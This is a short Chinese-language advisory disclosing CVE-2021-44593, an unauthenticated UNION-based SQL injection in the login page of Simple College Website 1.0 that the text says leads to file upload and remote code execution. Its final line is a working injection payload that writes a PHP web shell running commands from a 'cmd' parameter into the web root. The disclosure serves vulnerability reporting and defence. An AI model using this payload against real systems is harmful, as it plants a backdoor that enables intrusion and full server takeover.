CVE-2021-44593 的公开披露。Simple College Website 中存在 SQL 注入/任意文件上传/远程代码执行漏洞。
Simple College Website 1.0 在 /admin/login.php 页面的 "username" 参数中存在未经验证的基于 UNION 的 SQL 注入漏洞,该漏洞可被利用来上传任意文件并获得远程代码执行能力。
admin_class.php 中的 login() 函数
' union select null, null, ("<?php system($_GET['cmd']);?>"), null, null INTO OUTFILE '/var/www/html/testing.php'; -- -